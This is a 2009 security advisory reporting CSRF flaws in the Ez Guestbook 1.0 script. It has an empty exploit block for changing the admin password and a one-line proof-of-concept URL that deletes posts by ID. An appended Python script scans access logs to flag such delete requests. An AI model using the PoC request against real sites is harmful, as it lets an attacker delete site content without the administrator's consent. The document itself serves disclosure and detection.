[-------------------------------------------------------------------------------------------------]
[ Title: Ez Guestbook 1.0 Multiple Vulnerabilities ]
[ Author: Milos Zivanovic ]
[ Email: milosz.security[at]gmail.com ]
[ Date: 14. December 2009. ]
[-------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[ Application: Ez Guestbook ]
[ Version: 1.0 ]
[ Link: http://www.scriptsez.net/?action=details&cat=Guestbooks&id=11873094083 ]
[ Price: 10 USD ]
[ Vulnerability: Cross Site Request Forgery ]
[-------------------------------------------------------------------------------------------------]

Ez Guestbook script version 1.0 suffers from multiple vulnerabilities:

[#]Content
 |--Change admin password
 |--Remove post by ID

[*]Change admin password

[EXPLOIT------------------------------------------------------------------------------------------]
[EXPLOIT------------------------------------------------------------------------------------------]

[+]Remove post by ID

[POC----------------------------------------------------------------------------------------------]
http://localhost/ez_gb/admin.php?action=view&do=delete&id=[ID]
[POC----------------------------------------------------------------------------------------------]

[----------------------------------------------EOF------------------------------------------------]
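
Added example, not part of the original advisory or of the Ez Guestbook code: a Python check that scans web server access logs for the delete request shown in the PoC and reports the ones whose Referer is missing or points to another host, which is how a forged cross-site request usually appears in logs. The combined log format, the host name guestbook.example, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the server writes Apache/nginx "combined" format access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Dec/2009:10:01:02 +0000] "GET /ez_gb/admin.php?action=view&do=delete&id=7 HTTP/1.1" 200 512 "http://guestbook.example/ez_gb/admin.php?action=view" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Dec/2009:10:05:40 +0000] "GET /ez_gb/admin.php?action=view&do=delete&id=8 HTTP/1.1" 200 512 "http://forum.example/thread/42" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Dec/2009:10:06:11 +0000] "GET /ez_gb/admin.php?action=view&do=delete&id=9 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [14/Dec/2009:10:07:00 +0000] "GET /ez_gb/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def delete_id(target):
    """Return the post id if the request target has the PoC's shape, else None."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return None
    q = parse_qs(parts.query)
    if (parts.path.endswith("/admin.php")
            and q.get("action") == ["view"] and q.get("do") == ["delete"]):
        return q.get("id", [None])[0]
    return None

def referer_host(referer):
    """Host part of a Referer value; None for '-', empty or malformed values."""
    try:
        return urlsplit(referer).hostname
    except ValueError:
        return None

def suspicious_deletes(lines, site_host):
    """List (ip, timestamp, post id, referer) for deletes not referred by site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        post_id = delete_id(m["target"])
        if post_id is not None and referer_host(m["referer"]) != site_host.lower():
            hits.append((m["ip"], m["ts"], post_id, m["referer"]))
    return hits
```

A missing Referer also occurs with privacy settings and bookmarked links, so the output is a triage list to compare against what the administrator actually did, not proof of a forged request.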